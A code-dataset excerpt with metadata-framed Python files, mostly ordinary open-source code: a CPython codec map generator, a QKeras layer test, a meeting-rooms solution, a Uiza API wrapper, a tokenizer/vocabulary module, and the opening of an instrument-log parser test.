] | 25,286 | 2015-03-03T23:18:02.000Z | 2022-03-31T23:17:27.000Z | Tools/unicode/genmap_support.py | shawwn/cpython | 0ff8a3b374286d2218fc18f47556a5ace202dad3 | [
"0BSD"
] | 31,623 | 2015-01-01T13:29:37.000Z | 2022-03-31T19:55:06.000Z | #
# genmap_support.py: Multibyte Codec Map Generator
#
# Original Author: Hye-Shik Chang <perky@FreeBSD.org>
# Modified Author: Dong-hee Na <donghee.na92@gmail.com>
#
class BufferedFiller:
def __init__(self, column=78):
self.column = column
self.buffered = []
self.cline = []
self.clen = 0
self.count = 0
def write(self, *data):
for s in data:
if len(s) > self.column:
raise ValueError("token is too long")
if len(s) + self.clen > self.column:
self.flush()
self.clen += len(s)
self.cline.append(s)
self.count += 1
def flush(self):
if not self.cline:
return
self.buffered.append(''.join(self.cline))
self.clen = 0
del self.cline[:]
def printout(self, fp):
self.flush()
for l in self.buffered:
fp.write(f'{l}\n')
del self.buffered[:]
def __len__(self):
return self.count
class DecodeMapWriter:
filler_class = BufferedFiller
def __init__(self, fp, prefix, decode_map):
self.fp = fp
self.prefix = prefix
self.decode_map = decode_map
self.filler = self.filler_class()
def update_decode_map(self, c1range, c2range, onlymask=(), wide=0):
c2values = range(c2range[0], c2range[1] + 1)
for c1 in range(c1range[0], c1range[1] + 1):
if c1 not in self.decode_map or (onlymask and c1 not in onlymask):
continue
c2map = self.decode_map[c1]
rc2values = [n for n in c2values if n in c2map]
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v in c2map:
self.filler.write('%d,' % c2map[v])
else:
self.filler.write('U,')
def generate(self, wide=False):
if not wide:
self.fp.write(f"static const ucs2_t __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
else:
self.fp.write(f"static const Py_UCS4 __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
if not wide:
self.fp.write(f"static const struct dbcs_index {self.prefix}_decmap[256] = {{\n")
else:
self.fp.write(f"static const struct widedbcs_index {self.prefix}_decmap[256] = {{\n")
for i in range(256):
if i in self.decode_map and self.prefix in self.decode_map[i]:
m = self.decode_map
prefix = self.prefix
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.write("{", "__%s_decmap" % prefix, "+", "%d" % m[i]['midx'],
",", "%d," % m[i]['min'], "%d" % m[i]['max'], "},")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
class EncodeMapWriter:
filler_class = BufferedFiller
elemtype = 'DBCHAR'
indextype = 'struct unim_index'
def __init__(self, fp, prefix, encode_map):
self.fp = fp
self.prefix = prefix
self.encode_map = encode_map
self.filler = self.filler_class()
def generate(self):
self.buildmap()
self.printmap()
def buildmap(self):
for c1 in range(0, 256):
if c1 not in self.encode_map:
continue
c2map = self.encode_map[c1]
rc2values = [k for k in c2map.keys()]
rc2values.sort()
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v not in c2map:
self.write_nochar()
elif isinstance(c2map[v], int):
self.write_char(c2map[v])
elif isinstance(c2map[v], tuple):
self.write_multic(c2map[v])
else:
raise ValueError
def write_nochar(self):
self.filler.write('N,')
def write_multic(self, point):
self.filler.write('M,')
def write_char(self, point):
self.filler.write(str(point) + ',')
def printmap(self):
self.fp.write(f"static const {self.elemtype} __{self.prefix}_encmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
self.fp.write(f"static const {self.indextype} {self.prefix}_encmap[256] = {{\n")
for i in range(256):
if i in self.encode_map and self.prefix in self.encode_map[i]:
self.filler.write("{", "__%s_encmap" % self.prefix, "+",
"%d" % self.encode_map[i]['midx'], ",",
"%d," % self.encode_map[i]['min'],
"%d" % self.encode_map[i]['max'], "},")
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.printout(self.fp)
self.fp.write("};\n\n")
def open_mapping_file(path, source):
try:
f = open(path)
except IOError:
raise SystemExit(f'{source} is needed')
return f
def print_autogen(fo, source):
fo.write(f'// AUTO-GENERATED FILE FROM {source}: DO NOT EDIT\n')
def loadmap(fo, natcol=0, unicol=1, sbcs=0):
print("Loading from", fo)
fo.seek(0, 0)
decmap = {}
for line in fo:
line = line.split('#', 1)[0].strip()
if not line or len(line.split()) < 2:
continue
row = [eval(e) for e in line.split()]
loc, uni = row[natcol], row[unicol]
if loc >= 0x100 or sbcs:
decmap.setdefault((loc >> 8), {})
decmap[(loc >> 8)][(loc & 0xff)] = uni
return decmap
| 31.150754 | 104 | 0.515728 | 5,284 | 0.852396 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.156154 |
5e1f0f8430d2f116abcaa857baa9397fb525b5b9 | 3,487 | py | Python | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 388 | 2019-08-06T22:16:48.000Z | 2022-03-30T17:17:47.000Z | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 76 | 2019-08-21T19:25:58.000Z | 2022-03-31T09:07:07.000Z | tests/qlayers_test.py | kshithijiyer/qkeras | 78ac608c6dcd84151792a986d03fe7afb17929cf | [
"Apache-2.0"
] | 79 | 2019-08-15T03:00:02.000Z | 2022-03-31T09:05:11.000Z | # Copyright 2019 Google LLC
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test layers from qlayers.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_allclose
import pytest
import logging
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.backend import clear_session
from qkeras import QActivation
from qkeras import QDense
from qkeras import quantized_bits
from qkeras.utils import model_save_quantized_weights
from qkeras.utils import quantized_model_from_json
def qdense_util(layer_cls,
kwargs=None,
input_data=None,
weight_data=None,
expected_output=None):
"""qlayer test utility."""
input_shape = input_data.shape
input_dtype = input_data.dtype
layer = layer_cls(**kwargs)
x = Input(shape=input_shape[1:], dtype=input_dtype)
y = layer(x)
layer.set_weights(weight_data)
model = Model(x, y)
actual_output = model.predict(input_data)
if expected_output is not None:
assert_allclose(actual_output, expected_output, rtol=1e-4)
@pytest.mark.parametrize(
'layer_kwargs, input_data, weight_data, bias_data, expected_output',
[
(
{
'units': 2,
'use_bias': True,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros'
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[40, 80]], dtype=K.floatx())), # expected_output
(
{
'units': 2,
'use_bias': True,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_quantizer': 'quantized_bits(2,0,alpha=1.0)',
'bias_quantizer': 'quantized_bits(2,0)',
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[2, 2]], dtype=K.floatx())), #expected_output
])
def test_qdense(layer_kwargs, input_data, weight_data, bias_data,
expected_output):
qdense_util(
layer_cls=QDense,
kwargs=layer_kwargs,
input_data=input_data,
weight_data=[weight_data, bias_data],
expected_output=expected_output)
if __name__ == '__main__':
pytest.main([__file__])
| 35.581633 | 80 | 0.62776 | 0 | 0 | 0 | 0 | 1,519 | 0.435618 | 0 | 0 | 1,092 | 0.313163 |
5e1f5b28440e3916c2f562221a0e73e7f0243f14 | 1,031 | py | Python | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 253/meetingroomII.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | """
timecompliexty = O(nlog(n))
separate start and end time into two list
sort each of them
use s,e represent start and end index from 0
iterate start time list by while loop
compare start[s] end[e]
if start >= end means after cur meeting finish another one can use the meeting room ,no need to add a new room
else means before current meeting finish another one need to use room so need add a new one
move two index s,e by compare and add num of meeting when a new room is needed
"""
from typing import List
class Solution:
def minMeetingRooms(self, intervals: List[List[int]]) -> int:
start = []
end = []
for i in intervals:
start.append(i[0])
end.append(i[1])
start.sort()
end.sort()
num = 0
s = e = 0
while s < len(start):
if start[s]>=end[e]:
e+=1
else:
num+=1
s+=1
return num
A = Solution()
intervals = [[13,15],[1,13]]
print(A.minMeetingRooms(intervals)) | 31.242424 | 110 | 0.602328 | 440 | 0.42677 | 0 | 0 | 0 | 0 | 0 | 0 | 486 | 0.471387 |
5e1f786401704260570a0a2ec7e2d5a110efb0fc | 3,528 | py | Python | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | 2 | 2019-04-22T11:39:36.000Z | 2020-05-26T04:01:43.000Z | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | null | null | null | uiza/api_resources/entity/entity.py | uizaio/api-wrapper-python | e67c162e711857341f7ef5752178219e94f604d3 | [
"MIT"
] | 2 | 2019-02-11T09:34:03.000Z | 2019-02-12T10:31:41.000Z | import uiza
from uiza import Connection
from uiza.api_resources.base.base import UizaBase
from uiza.settings.config import settings
from uiza.utility.utility import set_url
class Entity(UizaBase):
def __init__(self):
self.connection = Connection(workspace_api_domain=uiza.workspace_api_domain, api_key=uiza.authorization)
self.connection.url = set_url(
workspace_api_domain=self.connection.workspace_api_domain,
api_type=settings.uiza_api.entity.type,
api_version=settings.uiza_api.entity.version,
api_sub_url=settings.uiza_api.entity.sub_url
)
def search(self, keyword):
"""
Search entity base on keyword entered
:param keyword: keyword for search entity
"""
self.connection.url = '{}/search'.format(self.connection.url)
params = dict(keyword=keyword, appId=uiza.app_id)
query = self.url_encode(params=params)
data = self.connection.get(query=query)
return data
def generate_iframe(self, entityId, api):
"""
Generate iframe entity base on keyword entered
:param entityId: id of entity
:param api: api iframe
"""
self.connection.url = '{}/iframe'.format(self.connection.url)
params = dict(entityId=entityId, api=api, appId=uiza.app_id)
query = self.url_encode(params=params)
data = self.connection.get(query=query)
return data
def publish(self, id):
"""
Publish entity to CDN, use for streaming
:param id: identifier of entity
"""
self.connection.url = '{}/publish'.format(self.connection.url)
data = self.connection.post(data={'id': id, 'appId': uiza.app_id})
return data
def get_status_publish(self, id):
"""
Get status publish entity
:param id: identifier of entity
"""
self.connection.url = '{}/publish/status'.format(self.connection.url)
query = self.url_encode(params={'id': id, 'appId': uiza.app_id})
data = self.connection.get(query=query)
return data
def get_media_tracking(self, **kwargs):
"""
Get media tracking
:param progress: progress of entity. This is optional
"""
self.connection.url = '{}/tracking'.format(self.connection.url)
params = dict(appId=uiza.app_id)
if kwargs:
params.update(kwargs)
query = self.url_encode(params=params)
data = self.connection.get(query=query)
return data
def get_media_upload_detail(self, id):
"""
Get media upload detail
:param id: identifier of entity
"""
self.connection.url = '{}/tracking'.format(self.connection.url)
query = self.url_encode(params={'id': id, 'appId': uiza.app_id})
data = self.connection.get(query=query)
return data
def get_aws_upload_key(self):
"""
Return the bucket temporary upload storage & key for upload
:param appId: appId
"""
aws_sub_url = 'admin/app/config/aws'
self.connection.url = set_url(
workspace_api_domain=self.connection.workspace_api_domain,
api_type=settings.uiza_api.entity.type,
api_version=settings.uiza_api.entity.version,
api_sub_url=aws_sub_url
)
query = self.url_encode(params={'appId': uiza.app_id})
data = self.connection.get(query=query)
return data
| 32.971963 | 112 | 0.628685 | 3,352 | 0.950113 | 0 | 0 | 0 | 0 | 0 | 0 | 886 | 0.251134 |
5e207031666baef9fa1beb161fc9d7be24e369d1 | 15,851 | py | Python | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | 12 | 2020-05-04T18:01:48.000Z | 2022-03-23T22:38:31.000Z | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | 18 | 2020-07-14T15:08:59.000Z | 2022-03-17T09:28:19.000Z | text_models/vocabulary.py | INGEOTEC/text_models | f5a44585d21828e4309b2435d6f91f822a5debb5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from microtc.utils import load_model, Counter
from b4msa.textmodel import TextModel
from microtc.weighting import TFIDF
from microtc.utils import SparseMatrix
from scipy.sparse import csr_matrix
from typing import List, Iterable, OrderedDict, Union, Dict, Any, Tuple
from .utils import download_tokens, handle_day
TM_ARGS=dict(usr_option="delete", num_option="none",
url_option="delete", emo_option="none",
del_dup=False, del_punc=True)
class Vocabulary(object):
"""
Vocabulary class is used to transform the tokens and their
respective frequencies in a Text Model, as well as, to analyze
the tokens obtained from tweets collected.
This class can be used to replicate some of the Text Models
developed for :py:class:`EvoMSA.base.EvoMSA`.
:param data: Tokens and their frequencies
:type data: str or list
:param lang: Language (Ar, En, or Es)
:type lang: str
:param country: Two letter country code
:type country: str
:param states: Whether to keep the state or accumulate the information on the country
:type states: bool
>>> from text_models.vocabulary import Vocabulary
>>> day = dict(year=2020, month=2, day=14)
>>> voc = Vocabulary(day, lang="En", country="US")
"""
def __init__(self, data, lang: str="Es",
country: str=None, states: bool=False) -> None:
self._lang = lang
self._country = country
self._states = states
if isinstance(data, dict) and len(data) > 3:
self._data = data
else:
self.date = data
self._init(data)
if not states:
self._n_words = sum([v for k, v in self.voc.items() if k.count("~") == 0])
self._n_bigrams = sum([v for k, v in self.voc.items() if k.count("~")])
def probability(self):
"""Transform frequency to a probability"""
voc = self.voc
for k in voc:
num = voc[k]
if k.count("~"):
den = self._n_bigrams
else:
den = self._n_words
voc[k] = num / den
def _init(self, data):
"""
Process the :py:attr:`data` to create a :py:class:`microtc.utils.Counter`
"""
def sum_vocs(vocs):
voc = vocs[0]
for v in vocs[1:]:
voc = voc + v
return voc
if isinstance(data, list):
vocs = [download_tokens(day, lang=self._lang, country=self._country)
for day in data]
vocs = [load_model(x) for x in vocs]
if isinstance(vocs[0], Counter):
voc = sum_vocs(vocs)
elif not self._states:
vocs = [sum_vocs([v for _, v in i]) for i in vocs]
voc = sum_vocs(vocs)
else:
voc = {k: v for k, v in vocs[0]}
for v in vocs[1:]:
for k, d in v:
try:
voc[k] = voc[k] + d
except KeyError:
voc[k] = d
self._data = voc
else:
self.voc = load_model(download_tokens(data, lang=self._lang, country=self._country))
@property
def date(self):
"""
Date obtained from the filename, on multiple files, this is not available.
"""
return self._date
@date.setter
def date(self, d):
if isinstance(d, list):
self._date = None
return
self._date = handle_day(d)
@property
def weekday(self):
"""
Weekday
"""
return str(self.date.weekday())
@property
def voc(self):
"""Vocabulary, i.e., tokens and their frequencies"""
return self._data
@voc.setter
def voc(self, d):
if not isinstance(d, list):
self._data = d
return
if self._states:
self._data = {k: v for k, v in d}
return
aggr = d[0][1]
for _, v in d[1:]:
aggr = aggr + v
self._data = aggr
def common_words(self, quantile: float=None, bigrams=True):
"""Words used frequently; these correspond to py:attr:`EvoMSA.base.EvoMSA(B4MSA=True)`
In the case quantile is given the these words and bigrams correspond to
the most frequent.
"""
if quantile is None:
from EvoMSA.utils import download
return load_model(download("b4msa_%s.tm" % self._lang)).model.word2id
words_N = sum([v for k, v in self.voc.items() if k.count("~") == 0])
score = [[k, v / words_N] for k, v in self.voc.items() if k.count("~") == 0]
score.sort(key=lambda x: x[1], reverse=True)
cum, k = 0, 0
while cum <= quantile:
cum += score[k][1]
k += 1
output = [k for k, _ in score[:k]]
if bigrams:
bigrams_N = sum([v for k, v in self.voc.items() if k.count("~")])
score_bi = [[k, v / bigrams_N] for k, v in self.voc.items() if k.count("~")]
score_bi.sort(key=lambda x: x[1], reverse=True)
cum, k = 0, 0
while cum <= quantile:
cum += score_bi[k][1]
k += 1
output += [k for k, _ in score_bi[:k]]
return output
@staticmethod
def _co_occurrence(word: str, voc: dict) -> dict:
D = dict()
for k, v in voc.items():
if k.count("~") == 0:
continue
a, b = k.split("~")
if a != word and b != word:
continue
key = a if a != word else b
D[key] = v
return D
def co_occurrence(self, word: str) -> dict:
if self._states:
return {k: self._co_occurrence(word, v) for k, v in self.voc.items()}
return self._co_occurrence(word, self.voc)
def day_words(self) -> "Vocabulary":
"""Words used on the same day of different years"""
from datetime import date, datetime
hoy = date.today()
hoy = datetime(year=hoy.year, month=hoy.month, day=hoy.month)
L = []
for year in range(2015, hoy.year + 1):
try:
curr = datetime(year=year, month=self.date.month, day=self.date.day)
except ValueError:
continue
if (curr - self.date).days == 0:
continue
try:
download_tokens(curr, lang=self._lang, country=self._country)
except Exception:
continue
L.append(curr)
if len(L) == 0:
return None
return self.__class__(L if len(L) > 1 else L[0],
lang=self._lang,
country=self._country,
states=self._states)
def __iter__(self):
for x in self.voc:
yield x
def remove_emojis(self):
"""Remove emojis"""
from .dataset import Dataset
data = Dataset()
data.add(data.load_emojis())
keys = [(k, [x for x in data.klass(k) if not x.isnumeric()]) for k in self]
keys = [(k, v) for k, v in keys if len(v) and v[0] != "#"]
for k, v in keys:
del self.voc[k]
def previous_day(self):
"""Previous day"""
import datetime
one_day = datetime.timedelta(days=1)
r = self.date - one_day
_ = self.__class__(r, lang=self._lang,
country=self._country,
states=self._states)
return _
def __len__(self):
return len(self.voc)
def __getitem__(self, key):
return self.voc[key]
def __contains__(self, key):
return key in self.voc
def get(self, data, defaultvalue=0):
"""Frequency of data"""
return self.voc.get(data, defaultvalue)
def items(self):
"""Items of :py:attr:`self.voc`"""
return self.voc.items()
def remove(self, words: dict, bigrams=True) -> None:
"""
Remove the words from the current vocabulary
:param words: Tokens
"""
if not bigrams:
voc = self.voc
for w in words:
try:
del voc[w]
except Exception:
continue
return
K = []
for k in self.voc:
if k.count("~"):
a, b = k.split("~")
if a in words or b in words:
K.append(k)
if k in words:
K.append(k)
for k in K:
del self.voc[k]
def remove_qgrams(self):
pass
def histogram(self, min_elements: int=30, words: bool=False):
group = defaultdict(list)
[group[v].append(k) for k, v in self.voc.items() if words or k.count("~")]
keys = list(group.keys())
keys.sort()
lst = list()
hist = OrderedDict()
for k in keys:
_ = group[k]
if len(lst) + len(_) >= min_elements:
hist[k] = lst + _
lst = list()
continue
lst += _
if len(lst):
hist[k] = lst
return hist
class Tokenize(object):
""" Tokenize transforms a text into a sequence, where
each number identifies a particular token; the q-grams
that are not found in the text are ignored.
>>> from text_models import Tokenize
>>> tok = Tokenize().fit(["hi~mario", "mario"])
>>> tok.transform("good morning mario")
[1]
"""
def __init__(self, tm_args: Dict[str, Any]=TM_ARGS):
self._head = dict()
self._vocabulary = dict()
self._tag = "__end__"
self._textmodel = TextModel(**tm_args)
@property
def vocabulary(self) -> Dict[str, int]:
"""Vocabulary used"""
return self._vocabulary
@property
def textModel(self):
"""Text model, i.e., :py:class::`b4msa.text_model.TextModel`
"""
return self._textmodel
def fit(self, tokens: List[str]) -> 'Tokenize':
"""Train the tokenizer.
:param tokens: Vocabulary as a list of tokens
:type tokens: List[str]
"""
voc = self.vocabulary
head = self._head
tag = self._tag
for word in tokens:
if word in voc:
continue
current = head
for char in word:
try:
current = current[char]
except KeyError:
_ = dict()
current[char] = _
current = _
cnt = len(voc)
voc[word] = cnt
current[tag] = cnt
return self
def transform(self, texts: Union[Iterable[str], str]) -> List[Union[List[int], int]]:
"""Transform the input into a sequence where each element represents
a token in the vocabulary (i.e., :py:attr:`text_models.vocabulary.Tokenize.vocabulary`)"""
func = self.textModel.text_transformations
trans = self._transform
if isinstance(texts, str):
return trans(func(texts))
return [trans(func(x)) for x in texts]
def _transform(self, text: str) -> List[int]:
L = []
i = 0
while i < len(text):
wordid, pos = self.find(text, i=i)
if wordid == -1:
i += 1
continue
i = pos
L.append(wordid)
return L
def find(self, text: str, i: int=0) -> Tuple[int, int]:
end = i
head = self._head
current = head
tag = self._tag
wordid = -1
while i < len(text):
char = text[i]
try:
current = current[char]
i += 1
try:
wordid = current[tag]
end = i
except KeyError:
pass
except KeyError:
break
return wordid, end
def id2word(self, id: int) -> str:
"""Token associated with id
:param id: Identifier
:type id: int
"""
try:
id2w = self._id2w
except AttributeError:
id2w = {v: k for k, v in self.vocabulary.items()}
self._id2w = id2w
return id2w[id]
class BagOfWords(SparseMatrix):
"""Bag of word model using TFIDF and
:py:class:`text_models.vocabulary.Tokenize`
:param tokens: Language (Ar|En|Es) or list of tokens
:type tokens: str|List
"""
def __init__(self, tokens: Union[str, List[str]]="Es"):
from microtc.utils import load_model
from EvoMSA.utils import download
if isinstance(tokens, list):
xx = tokens
else:
xx = list(load_model(download("b4msa_%s.tm" % tokens)).model.word2id.keys())
tok = Tokenize()
f = lambda cdn: "~".join([x for x in cdn.split("~") if len(x)])
tok.fit([f(k) for k in xx if k.count("~") and k[:2] != "q:"])
tok.fit([f(k) for k in xx if k.count("~") == 0 and k[:2] != "q:"])
qgrams = [f(k[2:]) for k in xx if k[:2] == "q:"]
tok.fit([x for x in qgrams if x.count("~") == 0 if len(x) >=2])
self._tokenize = tok
self._text = "text"
@property
def tokenize(self) -> Tokenize:
"""
:py:class:`text_models.vocabulary.Tokenize` instance
"""
return self._tokenize
def get_text(self, data: Union[dict, str]) -> str:
"""Get text keywords from dict"""
if isinstance(data, str):
return data
return data[self._text]
def fit(self, X: List[Union[str, dict]]) -> 'BagOfWords':
""" Train the Bag of words model"""
from microtc.utils import Counter
get_text = self.get_text
cnt = Counter()
tokens = self.tokenize.transform([get_text(x) for x in X])
[cnt.update(x) for x in tokens]
self._tfidf = TFIDF.counter(cnt)
return self
@property
def tfidf(self)->TFIDF:
return self._tfidf
def id2word(self, id: int) -> str:
"""Token associated with id
:param id: Identifier
:type id: int
"""
try:
w_id2w = self._w_id2w
except AttributeError:
self._w_id2w = {v: k for k, v in self.tfidf.word2id.items()}
w_id2w = self._w_id2w
id = w_id2w[id]
return self.tokenize.id2word(id)
@property
def num_terms(self):
return len(self.tokenize.vocabulary)
def _transform(self, data: List[str]) -> List[Tuple[int, float]]:
"""Transform a list of text to a Bag of Words using TFIDF"""
data = self.tokenize.transform(data)
tfidf = self.tfidf
return [tfidf[x] for x in data]
def transform(self, data: List[str]) -> csr_matrix:
"""Transform a list of text to a Bag of Words using TFIDF"""
return self.tonp(self._transform(data)) | 31.388119 | 98 | 0.527159 | 14,763 | 0.931361 | 66 | 0.004164 | 1,785 | 0.112611 | 0 | 0 | 3,650 | 0.230269 |
5e213db3d7c8731ee9cd5b190ac0d877c08a9943 | 23,700 | py | Python | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_nutnrb.py | rhan1498/marine-integrations | ad94c865e0e4cc7c8fd337870410c74b57d5c826 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_nutnrb
@file marine-integrations/mi/dataset/parser/test/test_nutnrb.py
@author Roger Unwin
@brief Test code for a Nutnrb data parser
"""
import unittest
import gevent
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from mi.core.exceptions import SampleException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_driver import DataSetDriverConfigKeys
from mi.dataset.parser.nutnrb import NutnrbParser, NutnrbDataParticle, StateKey
# Add a mixin here if needed
@unittest.skip('Nutnr parser is broken, timestamp needs to be fixed')
@attr('UNIT', group='mi')
class NutnrbParserUnitTestCase(ParserUnitTestCase):
"""
WFP Parser unit test suite
"""
TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
